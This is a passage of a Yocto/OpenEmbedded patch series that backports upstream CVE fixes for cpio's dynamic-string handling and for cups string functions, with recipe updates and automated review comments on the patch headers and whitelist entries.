266+ /* Silently ignore EROFS because reading the file won't have upset its
267 timestamp if it's on a read-only filesystem. */
268 if (fdutimens (fd, name, ts) < 0 && errno != EROFS)
269 utime_error (name);
270@@ -1297,7 +1297,7 @@ cpio_safer_name_suffix (char *name, bool link_target, bool absolute_names,
271
272 /* This is a simplified form of delayed set_stat used by GNU tar.
273 With the time, both forms will merge and pass to paxutils
274-
275+
276 List of directories whose statuses we need to extract after we've
277 finished extracting their subsidiary files. If you consider each
278 contiguous subsequence of elements of the form [D]?[^D]*, where [D]
279@@ -1415,7 +1415,7 @@ cpio_mkdir (struct cpio_file_stat *file_hdr, int *setstat_delayed)
280 {
281 int rc;
282 mode_t mode = file_hdr->c_mode;
283-
284+
285 if (!(file_hdr->c_mode & S_IWUSR))
286 {
287 rc = mkdir (file_hdr->c_name, mode | S_IWUSR);
288@@ -1438,10 +1438,10 @@ cpio_create_dir (struct cpio_file_stat *file_hdr, int existing_dir)
289 {
290 int res; /* Result of various function calls. */
291 int setstat_delayed = 0;
292-
293+
294 if (to_stdout_option)
295 return 0;
296-
297+
298 /* Strip any trailing `/'s off the filename; tar puts
299 them on. We might as well do it here in case anybody
300 else does too, since they cause strange things to happen. */
301@@ -1530,7 +1530,7 @@ arf_stores_inode_p (enum archive_format arf)
302 }
303 return 1;
304 }
305-
306+
307 void
308 cpio_file_stat_init (struct cpio_file_stat *file_hdr)
309 {
310--
3112.39.2
312
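Review bot: The switch of `last_header_start` (src/extern.h, src/global.c) and of the `prepare_append` locals in src/util.c to `off_t` only lifts the 2G limit where `off_t` is 64 bits wide. On 32-bit targets that depends on the build enabling large-file support, which nothing in this patch shows. I would record the dependency in the patch header, e.g. `Note: needs 64-bit off_t (large-file support) to have any effect on 32-bit targets.`, and confirm it in the generated config.h of a 32-bit build. Apart from those declarations, the remaining src/util.c hunks appear to change whitespace only, so they add conflict surface with CVE-2021-38185.patch, which edits the same file, without changing behaviour. The body of `prepare_append` continues outside its hunk, so the arithmetic on the new types cannot be checked from here.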
diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
new file mode 100644
index 0000000000..6ceafeee49
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
@@ -0,0 +1,581 @@
1GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted
2pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers
3an out-of-bounds heap write.
4
5CVE: CVE-2021-38185
6Upstream-Status: Backport
7Signed-off-by: Ross Burton <ross.burton@arm.com>
8
9From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001
10From: Sergey Poznyakoff <gray@gnu.org>
11Date: Sat, 7 Aug 2021 12:52:21 +0300
12Subject: [PATCH 1/3] Rewrite dynamic string support.
13
14* src/dstring.c (ds_init): Take a single argument.
15(ds_free): New function.
16(ds_resize): Take a single argument. Use x2nrealloc to expand
17the storage.
18(ds_reset,ds_append,ds_concat,ds_endswith): New function.
19(ds_fgetstr): Rewrite. In particular, this fixes integer overflow.
20* src/dstring.h (dynamic_string): Keep both the allocated length
21(ds_size) and index of the next free byte in the string (ds_idx).
22(ds_init,ds_resize): Change signature.
23(ds_len): New macro.
24(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos.
25* src/copyin.c: Use new ds_ functions.
26* src/copyout.c: Likewise.
27* src/copypass.c: Likewise.
28* src/util.c: Likewise.
29---
30 src/copyin.c | 40 +++++++++++------------
31 src/copyout.c | 16 ++++-----
32 src/copypass.c | 34 +++++++++----------
33 src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++--------------
34 src/dstring.h | 31 +++++++++---------
35 src/util.c | 6 ++--
36 6 files changed, 123 insertions(+), 92 deletions(-)
37
38diff --git a/src/copyin.c b/src/copyin.c
39index b29f348..37e503a 100644
40--- a/src/copyin.c
41+++ b/src/copyin.c
42@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out,
43 char *str_res; /* Result for string function. */
44 static dynamic_string new_name; /* New file name for rename option. */
45 static int initialized_new_name = false;
46+
47 if (!initialized_new_name)
48- {
49- ds_init (&new_name, 128);
50- initialized_new_name = true;
51- }
52+ {
53+ ds_init (&new_name);
54+ initialized_new_name = true;
55+ }
56
57 if (rename_flag)
58 {
59@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name)
60 already in `save_patterns' (from the command line) are preserved. */
61
62 static void
63-read_pattern_file ()
64+read_pattern_file (void)
65 {
66- int max_new_patterns;
67- char **new_save_patterns;
68- int new_num_patterns;
69+ char **new_save_patterns = NULL;
70+ size_t max_new_patterns;
71+ size_t new_num_patterns;
72 int i;
73- dynamic_string pattern_name;
74+ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER;
75 FILE *pattern_fp;
76
77 if (num_patterns < 0)
78 num_patterns = 0;
79- max_new_patterns = 1 + num_patterns;
80- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *));
81 new_num_patterns = num_patterns;
82- ds_init (&pattern_name, 128);
83+ max_new_patterns = num_patterns;
84+ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0]));
85
86 pattern_fp = fopen (pattern_file_name, "r");
87 if (pattern_fp == NULL)
88 open_fatal (pattern_file_name);
89 while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL)
90 {
91- if (new_num_patterns >= max_new_patterns)
92- {
93- max_new_patterns += 1;
94- new_save_patterns = (char **)
95- xrealloc ((char *) new_save_patterns,
96- max_new_patterns * sizeof (char *));
97- }
98+ if (new_num_patterns == max_new_patterns)
99+ new_save_patterns = x2nrealloc (new_save_patterns,
100+ &max_new_patterns,
101+ sizeof (new_save_patterns[0]));
102 new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string);
103 ++new_num_patterns;
104 }
105+
106+ ds_free (&pattern_name);
107+
108 if (ferror (pattern_fp) || fclose (pattern_fp) == EOF)
109 close_error (pattern_file_name);
110
111@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count)
112 in the file system. */
113
114 void
115-process_copy_in ()
116+process_copy_in (void)
117 {
118 char done = false; /* True if trailer reached. */
119 FILE *tty_in = NULL; /* Interactive file for rename option. */
120diff --git a/src/copyout.c b/src/copyout.c
121index 8b0beb6..26e3dda 100644
122--- a/src/copyout.c
123+++ b/src/copyout.c
124@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value)
125 The format of the header depends on the compatibility (-c) flag. */
126
127 void
128-process_copy_out ()
129+process_copy_out (void)
130 {
131- dynamic_string input_name; /* Name of file read from stdin. */
132+ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
133+ /* Name of file read from stdin. */
134 struct stat file_stat; /* Stat record for file. */
135 struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER;
136 /* Output header information. */
137@@ -605,7 +606,6 @@ process_copy_out ()
138 char *orig_file_name = NULL;
139
140 /* Initialize the copy out. */
141- ds_init (&input_name, 128);
142 file_hdr.c_magic = 070707;
143
144 /* Check whether the output file might be a tape. */
145@@ -657,14 +657,9 @@ process_copy_out ()
146 {
147 if (file_hdr.c_mode & CP_IFDIR)
148 {
149- int len = strlen (input_name.ds_string);
150 /* Make sure the name ends with a slash */
151- if (input_name.ds_string[len-1] != '/')
152- {
153- ds_resize (&input_name, len + 2);
154- input_name.ds_string[len] = '/';
155- input_name.ds_string[len+1] = 0;
156- }
157+ if (!ds_endswith (&input_name, '/'))
158+ ds_append (&input_name, '/');
159 }
160 }
161
162@@ -875,6 +870,7 @@ process_copy_out ()
163 (unsigned long) blocks), (unsigned long) blocks);
164 }
165 cpio_file_stat_free (&file_hdr);
166+ ds_free (&input_name);
167 }
168
169
170diff --git a/src/copypass.c b/src/copypass.c
171index dc13b5b..62f31c6 100644
172--- a/src/copypass.c
173+++ b/src/copypass.c
174@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st)
175 If `link_flag', link instead of copying. */
176
177 void
178-process_copy_pass ()
179+process_copy_pass (void)
180 {
181- dynamic_string input_name; /* Name of file from stdin. */
182- dynamic_string output_name; /* Name of new file. */
183+ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
184+ /* Name of file from stdin. */
185+ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER;
186+ /* Name of new file. */
187 size_t dirname_len; /* Length of `directory_name'. */
188 int res; /* Result of functions. */
189 char *slash; /* For moving past slashes in input name. */
190@@ -65,25 +67,18 @@ process_copy_pass ()
191 created files */
192
193 /* Initialize the copy pass. */
194- ds_init (&input_name, 128);
195
196 dirname_len = strlen (directory_name);
197 if (change_directory_option && !ISSLASH (directory_name[0]))
198 {
199 char *pwd = xgetcwd ();
200-
201- dirname_len += strlen (pwd) + 1;
202- ds_init (&output_name, dirname_len + 2);
203- strcpy (output_name.ds_string, pwd);
204- strcat (output_name.ds_string, "/");
205- strcat (output_name.ds_string, directory_name);
206+
207+ ds_concat (&output_name, pwd);
208+ ds_append (&output_name, '/');
209 }
210- else
211- {
212- ds_init (&output_name, dirname_len + 2);
213- strcpy (output_name.ds_string, directory_name);
214- }
215- output_name.ds_string[dirname_len] = '/';
216+ ds_concat (&output_name, directory_name);
217+ ds_append (&output_name, '/');
218+ dirname_len = ds_len (&output_name);
219 output_is_seekable = true;
220
221 change_dir ();
222@@ -116,8 +111,8 @@ process_copy_pass ()
223 /* Make the name of the new file. */
224 for (slash = input_name.ds_string; *slash == '/'; ++slash)
225 ;
226- ds_resize (&output_name, dirname_len + strlen (slash) + 2);
227- strcpy (output_name.ds_string + dirname_len + 1, slash);
228+ ds_reset (&output_name, dirname_len);
229+ ds_concat (&output_name, slash);
230
231 existing_dir = false;
232 if (lstat (output_name.ds_string, &out_file_stat) == 0)
233@@ -333,6 +328,9 @@ process_copy_pass ()
234 (unsigned long) blocks),
235 (unsigned long) blocks);
236 }
237+
238+ ds_free (&input_name);
239+ ds_free (&output_name);
240 }
241
242 /* Try and create a hard link from FILE_NAME to another file
243diff --git a/src/dstring.c b/src/dstring.c
244index e9c063f..358f356 100644
245--- a/src/dstring.c
246+++ b/src/dstring.c
247@@ -20,8 +20,8 @@
248 #if defined(HAVE_CONFIG_H)
249 # include <config.h>
250 #endif
251-
252 #include <stdio.h>
253+#include <stdlib.h>
254 #if defined(HAVE_STRING_H) || defined(STDC_HEADERS)
255 #include <string.h>
256 #else
257@@ -33,24 +33,41 @@
258 /* Initialiaze dynamic string STRING with space for SIZE characters. */
259
260 void
261-ds_init (dynamic_string *string, int size)
262+ds_init (dynamic_string *string)
263+{
264+ memset (string, 0, sizeof *string);
265+}
266+
267+/* Free the dynamic string storage. */
268+
269+void
270+ds_free (dynamic_string *string)
271 {
272- string->ds_length = size;
273- string->ds_string = (char *) xmalloc (size);
274+ free (string->ds_string);
275 }
276
277-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */
278+/* Expand dynamic string STRING, if necessary. */
279
280 void
281-ds_resize (dynamic_string *string, int size)
282+ds_resize (dynamic_string *string)
283 {
284- if (size > string->ds_length)
285+ if (string->ds_idx == string->ds_size)
286 {
287- string->ds_length = size;
288- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size);
289+ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
290+ 1);
291 }
292 }
293
294+/* Reset the index of the dynamic string S to LEN. */
295+
296+void
297+ds_reset (dynamic_string *s, size_t len)
298+{
299+ while (len > s->ds_size)
300+ ds_resize (s);
301+ s->ds_idx = len;
302+}
303+
304 /* Dynamic string S gets a string terminated by the EOS character
305 (which is removed) from file F. S will increase
306 in size during the function if the string from F is longer than
307@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size)
308 char *
309 ds_fgetstr (FILE *f, dynamic_string *s, char eos)
310 {
311- int insize; /* Amount needed for line. */
312- int strsize; /* Amount allocated for S. */
313 int next_ch;
314
315 /* Initialize. */
316- insize = 0;
317- strsize = s->ds_length;
318+ s->ds_idx = 0;
319
320 /* Read the input string. */
321- next_ch = getc (f);
322- while (next_ch != eos && next_ch != EOF)
323+ while ((next_ch = getc (f)) != eos && next_ch != EOF)
324 {
325- if (insize >= strsize - 1)
326- {
327- ds_resize (s, strsize * 2 + 2);
328- strsize = s->ds_length;
329- }
330- s->ds_string[insize++] = next_ch;
331- next_ch = getc (f);
332+ ds_resize (s);
333+ s->ds_string[s->ds_idx++] = next_ch;
334 }
335- s->ds_string[insize++] = '\0';
336+ ds_resize (s);
337+ s->ds_string[s->ds_idx] = '\0';
338
339- if (insize == 1 && next_ch == EOF)
340+ if (s->ds_idx == 0 && next_ch == EOF)
341 return NULL;
342 else
343 return s->ds_string;
344 }
345
346+void
347+ds_append (dynamic_string *s, int c)
348+{
349+ ds_resize (s);
350+ s->ds_string[s->ds_idx] = c;
351+ if (c)
352+ {
353+ s->ds_idx++;
354+ ds_resize (s);
355+ s->ds_string[s->ds_idx] = 0;
356+ }
357+}
358+
359+void
360+ds_concat (dynamic_string *s, char const *str)
361+{
362+ size_t len = strlen (str);
363+ while (len + 1 > s->ds_size)
364+ ds_resize (s);
365+ memcpy (s->ds_string + s->ds_idx, str, len);
366+ s->ds_idx += len;
367+ s->ds_string[s->ds_idx] = 0;
368+}
369+
370 char *
371 ds_fgets (FILE *f, dynamic_string *s)
372 {
373@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s)
374 {
375 return ds_fgetstr (f, s, '\0');
376 }
377+
378+/* Return true if the dynamic string S ends with character C. */
379+int
380+ds_endswith (dynamic_string *s, int c)
381+{
382+ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c);
383+}
384diff --git a/src/dstring.h b/src/dstring.h
385index b5135fe..f5b04ef 100644
386--- a/src/dstring.h
387+++ b/src/dstring.h
388@@ -17,10 +17,6 @@
389 Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
390 Boston, MA 02110-1301 USA. */
391
392-#ifndef NULL
393-#define NULL 0
394-#endif
395-
396 /* A dynamic string consists of record that records the size of an
397 allocated string and the pointer to that string. The actual string
398 is a normal zero byte terminated string that can be used with the
399@@ -30,22 +26,25 @@
400
401 typedef struct
402 {
403- int ds_length; /* Actual amount of storage allocated. */
404- char *ds_string; /* String. */
405+ size_t ds_size; /* Actual amount of storage allocated. */
406+ size_t ds_idx; /* Index of the next free byte in the string. */
407+ char *ds_string; /* String storage. */
408 } dynamic_string;
409
410+#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL }
411
412-/* Macros that look similar to the original string functions.
413- WARNING: These macros work only on pointers to dynamic string records.
414- If used with a real record, an "&" must be used to get the pointer. */
415-#define ds_strlen(s) strlen ((s)->ds_string)
416-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string)
417-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n)
418-#define ds_index(s, c) index ((s)->ds_string, c)
419-#define ds_rindex(s, c) rindex ((s)->ds_string, c)
420+void ds_init (dynamic_string *string);
421+void ds_free (dynamic_string *string);
422+void ds_reset (dynamic_string *s, size_t len);
423
424-void ds_init (dynamic_string *string, int size);
425-void ds_resize (dynamic_string *string, int size);
426+/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */
427 char *ds_fgetname (FILE *f, dynamic_string *s);
428 char *ds_fgets (FILE *f, dynamic_string *s);
429 char *ds_fgetstr (FILE *f, dynamic_string *s, char eos);
430+void ds_append (dynamic_string *s, int c);
431+void ds_concat (dynamic_string *s, char const *str);
432+
433+#define ds_len(s) ((s)->ds_idx)
434+
435+int ds_endswith (dynamic_string *s, int c);
436+
437diff --git a/src/util.c b/src/util.c
438index 4421b20..6d6bbaa 100644
439--- a/src/util.c
440+++ b/src/util.c
441@@ -846,11 +846,9 @@ get_next_reel (int tape_des)
442 FILE *tty_out; /* File for interacting with user. */
443 int old_tape_des;
444 char *next_archive_name;
445- dynamic_string new_name;
446+ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER;
447 char *str_res;
448
449- ds_init (&new_name, 128);
450-
451 /* Open files for interactive communication. */
452 tty_in = fopen (TTY_NAME, "r");
453 if (tty_in == NULL)
454@@ -925,7 +923,7 @@ get_next_reel (int tape_des)
455 error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"),
456 old_tape_des, tape_des);
457
458- free (new_name.ds_string);
459+ ds_free (&new_name);
460 fclose (tty_in);
461 fclose (tty_out);
462 }
463--
4642.25.1
465
466
467From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001
468From: Sergey Poznyakoff <gray@gnu.org>
469Date: Wed, 11 Aug 2021 18:10:38 +0300
470Subject: [PATCH 2/3] Fix previous commit
471
472* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a
473loop.
474---
475 src/dstring.c | 4 ++--
476 1 file changed, 2 insertions(+), 2 deletions(-)
477
478diff --git a/src/dstring.c b/src/dstring.c
479index 358f356..90c691c 100644
480--- a/src/dstring.c
481+++ b/src/dstring.c
482@@ -64,7 +64,7 @@ void
483 ds_reset (dynamic_string *s, size_t len)
484 {
485 while (len > s->ds_size)
486- ds_resize (s);
487+ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
488 s->ds_idx = len;
489 }
490
491@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str)
492 {
493 size_t len = strlen (str);
494 while (len + 1 > s->ds_size)
495- ds_resize (s);
496+ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
497 memcpy (s->ds_string + s->ds_idx, str, len);
498 s->ds_idx += len;
499 s->ds_string[s->ds_idx] = 0;
500--
5012.25.1
502
503
504From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001
505From: Sergey Poznyakoff <gray@gnu.org>
506Date: Wed, 18 Aug 2021 09:41:39 +0300
507Subject: [PATCH 3/3] Fix dynamic string reallocations
508
509* src/dstring.c (ds_resize): Take additional argument: number of
510bytes to leave available after ds_idx. All uses changed.
511---
512 src/dstring.c | 18 ++++++++----------
513 1 file changed, 8 insertions(+), 10 deletions(-)
514
515diff --git a/src/dstring.c b/src/dstring.c
516index 90c691c..0f597cc 100644
517--- a/src/dstring.c
518+++ b/src/dstring.c
519@@ -49,9 +49,9 @@ ds_free (dynamic_string *string)
520 /* Expand dynamic string STRING, if necessary. */
521
522 void
523-ds_resize (dynamic_string *string)
524+ds_resize (dynamic_string *string, size_t len)
525 {
526- if (string->ds_idx == string->ds_size)
527+ while (len + string->ds_idx >= string->ds_size)
528 {
529 string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
530 1);
531@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string)
532 void
533 ds_reset (dynamic_string *s, size_t len)
534 {
535- while (len > s->ds_size)
536- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
537+ ds_resize (s, len);
538 s->ds_idx = len;
539 }
540
541@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
542 /* Read the input string. */
543 while ((next_ch = getc (f)) != eos && next_ch != EOF)
544 {
545- ds_resize (s);
546+ ds_resize (s, 0);
547 s->ds_string[s->ds_idx++] = next_ch;
548 }
549- ds_resize (s);
550+ ds_resize (s, 0);
551 s->ds_string[s->ds_idx] = '\0';
552
553 if (s->ds_idx == 0 && next_ch == EOF)
554@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
555 void
556 ds_append (dynamic_string *s, int c)
557 {
558- ds_resize (s);
559+ ds_resize (s, 0);
560 s->ds_string[s->ds_idx] = c;
561 if (c)
562 {
563 s->ds_idx++;
564- ds_resize (s);
565+ ds_resize (s, 0);
566 s->ds_string[s->ds_idx] = 0;
567 }
568 }
569@@ -115,8 +114,7 @@ void
570 ds_concat (dynamic_string *s, char const *str)
571 {
572 size_t len = strlen (str);
573- while (len + 1 > s->ds_size)
574- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
575+ ds_resize (s, len);
576 memcpy (s->ds_string + s->ds_idx, str, len);
577 s->ds_idx += len;
578 s->ds_string[s->ds_idx] = 0;
579--
5802.25.1
581
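Review bot: The three commits in this file are only safe as a set, and the header does not say so. After [PATCH 1/3] and [PATCH 2/3], `ds_concat` still sizes the buffer with `while (len + 1 > s->ds_size)`, which ignores `ds_idx`, so appending to a non-empty string (as `process_copy_pass` does when it builds `output_name`) can pass the check and `memcpy` beyond the allocation. Only [PATCH 3/3] closes this, with `ds_resize (s, len)` testing `len + string->ds_idx >= string->ds_size`. The header should state that the patch must not be split or partially reverted. It should also name the upstream commits, which `Upstream-Status: Backport` omits here, unlike the two sibling cpio patches: `Upstream-Status: Backport [<upstream commit ids of all three changes>]`.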
diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb
index 9e35a80f8b..5ab567f360 100644
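--- a/meta/recipes-extended/cpio/cpio_2.13.bb
+++ b/meta/recipes-extended/cpio/cpio_2.13.bb
@@ -9,6 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949"
 SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \
  file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
  file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \
+ file://CVE-2021-38185.patch \
+ file://0003-Fix-calculation-of-CRC-in-copy-out-mode.patch \
+ file://0004-Fix-appending-to-archives-bigger-than-2G.patch \
  "
 
 SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810"
@@ -16,6 +19,9 @@ SRC_URI[sha256sum] = "e87470d9c984317f658567c03bfefb6b0c829ff17dbf6b0de48d71a4c8
 
 inherit autotools gettext texinfo
 
+# Issue applies to use of cpio in SUSE/OBS, doesn't apply to us
+CVE_CHECK_WHITELIST += "CVE-2010-4226"
+
 EXTRA_OECONF += "DEFAULT_RMT_DIR=${sbindir}"
 
 do_install () {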
diff --git a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
index 82995219dc..9cdb71f1a1 100644
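--- a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
+++ b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Password strength checker library"
-HOMEPAGE = "http://sourceforge.net/projects/cracklib"
+HOMEPAGE = "https://github.com/cracklib/cracklib"
+DESCRIPTION = "${SUMMARY}"
 
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=e3eda01d9815f8d24aae2dbd89b68b06"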
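diff --git a/meta/recipes-extended/cups/cups.inc b/meta/recipes-extended/cups/cups.inc
index f6d54c7cf2..6cfe314f20 100644
--- a/meta/recipes-extended/cups/cups.inc
+++ b/meta/recipes-extended/cups/cups.inc
@@ -13,6 +13,11 @@ SRC_URI = "https://github.com/apple/cups/releases/download/v${PV}/${BP}-source.t
  file://0002-don-t-try-to-run-generated-binaries.patch \
  file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \
  file://0004-cups-fix-multilib-install-file-conflicts.patch\
+ file://CVE-2022-26691.patch \
+ file://CVE-2023-32324.patch \
+ file://CVE-2023-34241.patch \
+ file://CVE-2023-32360.patch \
+ file://CVE-2023-4504.patch \
  "
 
 UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases"
@@ -41,7 +46,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi',
 PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi"
 PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl"
 PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam"
-PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd"
+PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd"
 PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd"
 
 EXTRA_OECONF = " \
@@ -52,6 +57,9 @@ EXTRA_OECONF = " \
  --enable-debug \
  --disable-relro \
  --enable-libusb \
+ --with-system-groups=lpadmin \
+ --with-cups-group=lp \
+ --with-domainsocket=/run/cups/cups.sock \
  DSOFLAGS='${LDFLAGS}' \
  "
 
@@ -113,3 +121,7 @@ SYSROOT_PREPROCESS_FUNCS += "cups_sysroot_preprocess"
 cups_sysroot_preprocess () {
  sed -i ${SYSROOT_DESTDIR}${bindir_crossscripts}/cups-config -e 's:cups_datadir=.*:cups_datadir=${datadir}/cups:' -e 's:cups_serverbin=.*:cups_serverbin=${libexecdir}/cups:'
 }
+
+# -25317 concerns /var/log/cups having lp ownership. Our /var/log/cups is
+# root:root, so this doesn't apply.
+CVE_CHECK_WHITELIST += "CVE-2021-25317"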
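Review bot: The `CVE_CHECK_WHITELIST` entry for CVE-2021-25317 depends on /var/log/cups being root:root, but no line in these hunks creates or checks that directory, and the third hunk now passes `--with-cups-group=lp` to configure. Whatever sets the ownership (presumably `do_install` or a volatiles entry, both outside the hunks) should be named in the comment, e.g. `# /var/log/cups is created root:root in <place where it is created>; drop this entry if that changes`, so the exemption is re-checked when that code moves. A layer that changes the log directory owner through a bbappend would still inherit the whitelist entry, and cve-check would keep hiding the finding.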
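diff --git a/meta/recipes-extended/cups/cups/CVE-2022-26691.patch b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
new file mode 100644
index 0000000000..1fa5a54c70
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
@@ -0,0 +1,33 @@
+From de4f8c196106033e4c372dce3e91b9d42b0b9444 Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Thu, 26 May 2022 06:27:04 +0200
+Subject: [PATCH] scheduler/cert.c: Fix string comparison (fixes
+ CVE-2022-26691)
+
+The previous algorithm didn't expect the strings can have a different
+length, so one string can be a substring of the other and such substring
+was reported as equal to the longer string.
+
+CVE: CVE-2022-26691
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444]
+Signed-off-by: Steve Sakoman
+
+---
+diff --git a/scheduler/cert.c b/scheduler/cert.c
+index b268bf1b2..9b65b96c9 100644
+--- a/scheduler/cert.c
++++ b/scheduler/cert.c
+@@ -434,5 +434,12 @@ ctcompare(const char *a, /* I - First string */
+ b ++;
+ }
+
+- return (result);
++ /*
++ * The while loop finishes when *a == '\0' or *b == '\0'
++ * so after the while loop either both *a and *b == '\0',
++ * or one points inside a string, so when we apply logical OR on *a,
++ * *b and result, we get a non-zero return value if the compared strings don't match.
++ */
++
++ return (result | *a | *b);
+ }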
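diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32324.patch b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
new file mode 100644
index 0000000000..40b89c9899
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
@@ -0,0 +1,36 @@
+From 07cbffd11107eed3aaf1c64e35552aec20f792da Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Thu, 1 Jun 2023 12:04:00 +0200
+Subject: [PATCH] cups/string.c: Return if `size` is 0 (fixes CVE-2023-32324)
+
+CVE: CVE-2023-32324
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/fd8bc2d32589]
+
+(cherry picked from commit fd8bc2d32589d1fd91fe1c0521be2a7c0462109e)
+Signed-off-by: Sanjay Chitroda <schitrod@cisco.com>
+---
+ cups/string.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/cups/string.c b/cups/string.c
+index 93cdad19..6ef58515 100644
+--- a/cups/string.c
++++ b/cups/string.c
+@@ -1,6 +1,7 @@
+ /*
+ * String functions for CUPS.
+ *
++ * Copyright © 2023 by OpenPrinting.
+ * Copyright © 2007-2019 by Apple Inc.
+ * Copyright © 1997-2007 by Easy Software Products.
+ *
+@@ -730,6 +731,9 @@ _cups_strlcpy(char *dst, /* O - Destination string */
+ size_t srclen; /* Length of source string */
+
+
++ if (size == 0)
++ return (0);
++
+ /*
+ * Figure out how much room is needed...
+ */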
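Review bot: The early `return (0);` for `size == 0` departs from the strlcpy(3) convention of returning the source length, so a caller that sizes or retries from the return value gets 0 rather than the room needed. As a backport the code should stay as upstream has it, but the patch header says only that the function returns when `size` is 0. One more header line would record the contract, for example `size == 0 means no destination space; the function now returns 0 without reading src`. The rest of `_cups_strlcpy`, including the arithmetic this check presumably guards, is outside the hunk.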
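diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32360.patch b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
new file mode 100644
index 0000000000..4d39e1e57f
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
@@ -0,0 +1,31 @@
+From a0c8b9c9556882f00c68b9727a95a1b6d1452913 Mon Sep 17 00:00:00 2001
+From: Michael R Sweet <michael.r.sweet@gmail.com>
+Date: Tue, 6 Dec 2022 09:04:01 -0500
+Subject: [PATCH] Require authentication for CUPS-Get-Document.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/a0c8b9c9556882f00c68b9727a95a1b6d1452913]
+CVE: CVE-2023-32360
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ conf/cupsd.conf.in | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
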